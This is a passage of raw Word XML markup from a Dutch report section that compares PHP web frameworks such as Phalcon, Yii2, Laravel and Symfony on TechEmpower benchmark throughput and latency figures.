      </w:r>
    </w:p>
    <w:p w14:paraId="6A335580" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00C52533">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3584407D" w14:textId="38C1789C" w:rsidR="00173EB3" w:rsidRDefault="00394B19" w:rsidP="00C52533">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252167168" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72352B30" wp14:editId="4EC33D84">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896056</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3301859</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="496" name="Rectangle 49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34E10" id="Rectangle 496" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-259.95pt;width:25pt;height:1031.7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5wUJ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Q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PPbcO/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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00534DB4">
        <w:t>3.4</w:t>
      </w:r>
      <w:r w:rsidR="00A878AF" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F1550D">
        <w:t>Technologie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375BA57C" w14:textId="77777777" w:rsidR="00316BA5" w:rsidRPr="00316BA5" w:rsidRDefault="00316BA5" w:rsidP="0095687C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA6F104" w14:textId="56AFD2FE" w:rsidR="0095687C" w:rsidRPr="00486596" w:rsidRDefault="0070741F" w:rsidP="00330C02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00486596">
        <w:t>Web Application Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D52BF6C" w14:textId="70BC0C62"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45329F">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E4111D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C2D2B">
        <w:t xml:space="preserve">zij versnellen en </w:t>
      </w:r>
      <w:r w:rsidR="0082126B">
        <w:t>vermakelijke</w:t>
      </w:r>
      <w:r w:rsidR="007C2D2B">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidR="0082126B">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="0045329F">
        <w:t>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11EC004" w:rsidR="00253E27" w:rsidRDefault="004D7220" w:rsidP="0095687C">
      <w:r>
        <w:t xml:space="preserve">De Core features van </w:t>
      </w:r>
      <w:r w:rsidR="006D53E2">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>ebapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="006D53E2">
        <w:t xml:space="preserve"> f</w:t>
      </w:r>
      <w:r>
        <w:t>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03E0D867" w:rsidR="00C54EE6" w:rsidRDefault="00B123E5">
      <w:r>
        <w:t>Techempower brengt eerd</w:t>
      </w:r>
      <w:r w:rsidR="00DB1838">
        <w:t>er jaar een benchmark uit voor web f</w:t>
      </w:r>
      <w:r>
        <w:t>rameworks</w:t>
      </w:r>
      <w:r w:rsidR="00DB1838">
        <w:t>. Zij testen de web f</w:t>
      </w:r>
      <w:r w:rsidR="003C7481">
        <w:t xml:space="preserve">rameworks op een aantal types JSON serialisatie, </w:t>
      </w:r>
      <w:r w:rsidR="00B16E6F">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0096171C">
        <w:t>nkele query</w:t>
      </w:r>
      <w:r w:rsidR="005B66B9">
        <w:t>, data updates</w:t>
      </w:r>
      <w:r w:rsidR="008053B9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DB1838">
        <w:t>Ik zal de PHP f</w:t>
      </w:r>
      <w:r w:rsidR="000F2F4F">
        <w:t>rameworks met elkaar vergelijken op performance.</w:t>
      </w:r>
      <w:r w:rsidR="00142968">
        <w:t xml:space="preserve"> Uit het resultaat zal ik n</w:t>
      </w:r>
      <w:r w:rsidR="00DB1838">
        <w:t>og niet concluderen voor welke web f</w:t>
      </w:r>
      <w:r w:rsidR="00142968">
        <w:t>ramework ik ga kiezen. Hiervoor zal ik ook kijken naar de feat</w:t>
      </w:r>
      <w:r w:rsidR="00317257">
        <w:t>ures en schaalbaarheid die de frameworks bieden. PHP f</w:t>
      </w:r>
      <w:r w:rsidR="00142968">
        <w:t xml:space="preserve">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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Phalcon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4EF7F1" w14:textId="628A95D7" w:rsidR="00486596" w:rsidRDefault="00486596" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936ED45" w14:textId="77777777" w:rsidR="00486596" w:rsidRDefault="00486596" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>YII2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DD7D45" w14:textId="77777777" w:rsidR="00486596" w:rsidRDefault="00486596" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Laravel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C74F2A" w14:textId="221BE7E7" w:rsidR="00486596" w:rsidRDefault="00486596" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Symfony</w:t>
      </w:r>
      <w:r w:rsidR="00E707BA">
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711B41C9" w14:textId="77777777" w:rsidR="00E915E4" w:rsidRDefault="00486596" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D505F86" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00A5093B"/>
    <w:p w14:paraId="2EEC69A9" w14:textId="7DC2DC45" w:rsidR="00A77292" w:rsidRDefault="00C003AB" w:rsidP="00A5093B">
      <w:r>
        <w:t>In tabel 3.7</w:t>
      </w:r>
      <w:r w:rsidR="003E5093">
        <w:t xml:space="preserve"> zal ik </w:t>
      </w:r>
      <w:r w:rsidR="00A77292">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00424C00">
        <w:t>e benchmarks van techempower</w:t>
      </w:r>
      <w:r w:rsidR="00A77292">
        <w:t xml:space="preserve"> tonen om de keuze die ik heb gemaakt te onderbouwe</w:t>
      </w:r>
      <w:r w:rsidR="00DA7C4D">
        <w:t>n. De PHP f</w:t>
      </w:r>
      <w:r w:rsidR="0047231A">
        <w:t>rameworks worden op 3</w:t>
      </w:r>
      <w:r w:rsidR="00A77292">
        <w:t xml:space="preserve"> test types getest: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352886CB" w14:textId="1C97C97F" w:rsidR="00DB3214" w:rsidRDefault="00A77292" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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0092C944" w:rsidR="00A77292" w:rsidRDefault="00394B19" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252169216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50669D7D" wp14:editId="331BD5BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896761</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3302353</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="497" name="Rectangle 4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BBF1A" id="Rectangle 497" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.6pt;margin-top:-260pt;width:25pt;height:1031.7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DafZ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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A77292">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7F3FF092" w:rsidR="00AF0FB2" w:rsidRDefault="00A77292" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Data updates</w:t>
      </w:r>
      <w:r w:rsidR="008357C6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A119C">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="008357C6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603C35E3" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="005A119C"/>
    <w:p w14:paraId="4706F0D9" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="005A119C"/>
    <w:p w14:paraId="4DAAA887" w14:textId="5163E69C"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F730AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBE755"/>
          </w:tcPr>
          <w:p w14:paraId="4936C606" w14:textId="27C979BF" w:rsidR="00D8697D" w:rsidRPr="00B94177" w:rsidRDefault="00D8697D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>PHP Framework Benchmark</w:t>
            </w:r>
            <w:r w:rsidR="005F32CD" w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Gesorteerd op Performance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3B92" w14:paraId="33A86F80" w14:textId="77777777" w:rsidTr="0069493A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBE755"/>
          </w:tcPr>
          <w:p w14:paraId="1F30F15E" w14:textId="096F2008" w:rsidR="00FE3B92" w:rsidRPr="00B94177" w:rsidRDefault="00FE3B92">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>JSON serialisatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E72A9" w14:paraId="4434B5D4" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FCA5EDC" w14:textId="16F5D33C" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="00990F9C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71A60432" w14:textId="1D3426B3" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="00990F9C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
            <w:r w:rsidR="003E72A9" w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (hoe hoger hoe beter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08FBF00C" w14:textId="50A57D9C" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="00D453C6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Wachtijd</w:t>
            </w:r>
            <w:r w:rsidR="003E72A9" w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (hoe lager hoe beter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E72A9" w14:paraId="0A1A43EF" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35306C12" w14:textId="17551E6A" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="001E5A83">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phalcon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DAEB127" w14:textId="3A633BA3" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="005D5E1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>39,865 (7.1%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51CEEB00" w14:textId="242634D1" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="00F90C0F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>50.0 ms (3.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E72A9" w14:paraId="6FF7B9D5" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CACCEA3" w14:textId="377C96F5" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="001E5A83">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Yii2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C80207F" w14:textId="33CCA03F" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="001D50E1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="007E2397" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>,388 (1.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A6BADCF" w14:textId="0177B55A" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="00D84EEF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>27.1 ms (2.1%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="267E99A7" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DA12634" w14:textId="3C763F36" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Zend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A435C3F" w14:textId="5067E5E1" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>9,784 (1.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0536E868" w14:textId="75881E85" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00013A6C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>31.1 ms (</w:t>
            </w:r>
            <w:r w:rsidR="00711493" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2.4%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="31A9E726" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="292"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C92E8FE" w14:textId="2E0AA2DC" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Slim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B011D36" w14:textId="25E2085A" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>9.640 (1.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14CA584B" w14:textId="00DE2A97" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00711493">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>34.3 ms (2.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="5E486259" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C953663" w14:textId="4AFFD1F9" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Laravel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63544BEE" w14:textId="20C4DD01" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>7,020 (1.3%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33F1CCBE" w14:textId="3BC766DB" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00711493">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>38.0 ms (3.0%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="2D981BF8" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB9370D" w14:textId="43F5354B" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Symfony 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B81E503" w14:textId="74BF9737" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>3,588 (0.6%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="113B5E2A" w14:textId="5DDEC992" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00CA5808">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>74.3 ms (5.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6B3A" w14:paraId="1B2C0363" w14:textId="77777777" w:rsidTr="00F730AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBE755"/>
          </w:tcPr>
          <w:p w14:paraId="605AEC67" w14:textId="1C228DCA" w:rsidR="004F6B3A" w:rsidRPr="00B94177" w:rsidRDefault="004F6B3A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Enkele query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B173C" w14:paraId="2429747C" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EC644A9" w14:textId="56559B93" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="002B173C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phalcon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5744DED6" w14:textId="4DEF5134" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="00F53002">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="001F09AC" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>,604 (10.8%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0825909C" w14:textId="44B85A00" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="009B5320">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>29.4 ms (1.0%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="252B61DB" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
